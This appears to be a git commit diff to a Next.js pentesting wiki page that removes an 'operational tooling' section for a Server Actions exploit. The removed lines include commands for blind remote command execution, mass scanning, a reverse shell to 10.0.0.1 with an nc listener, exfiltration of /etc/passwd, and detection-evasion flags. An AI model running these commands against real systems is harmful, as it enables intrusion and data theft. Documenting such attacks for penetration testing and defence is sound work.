Update nextjs.md

Author: carlospolop

src/network-services-pentesting/pentesting-web/nextjs.md

@@ -1362,19 +1362,6 @@ Next.js App Router deployments that expose Server Actions on `react-server-dom-w
 }
 ```
 
-The Python proof-of-concept converts this JSON into a full Flight payload and posts it to the Server Action endpoint. Once arbitrary JS runs, attackers can drop to the OS, stage web shells, or pivot laterally using the Node process credentials.
-
-#### Operational tooling
-
-- **Single target check / exploitation:**
-  - `python3 exploit.py http://target:3000 --check` sends non-destructive payloads to confirm the vulnerable resolver behavior.
-  - `python3 exploit.py http://target:3000 -c "id"` executes blind shell commands through the Function gadget.
-- **Batch scanning:** `python3 exploit.py -f targets.txt --check --stealth crawler --delay 2 -o vulnerable.txt` iterates through a newline-separated target list (lines starting with `#` are ignored) and records confirmed hits.
-- **Post-exploitation primitives:**
-  - Reverse shell: `python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444` (pair with `nc -lvnp 4444`).
-  - Data exfiltration over raw sockets: `python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444`.
-- **OPSEC features:** `--proxy socks5://127.0.0.1:1080`, `--stealth {browser,crawler,security}`, `--delay <seconds>` and `--variants` randomize headers / payload encodings to evade noisy detections.
-
 ## References
 
 - [Pentesting Next.js Server Actions — A Burp Extension for Hash-to-Function Mapping](https://www.adversis.io/blogs/pentesting-next-js-server-actions)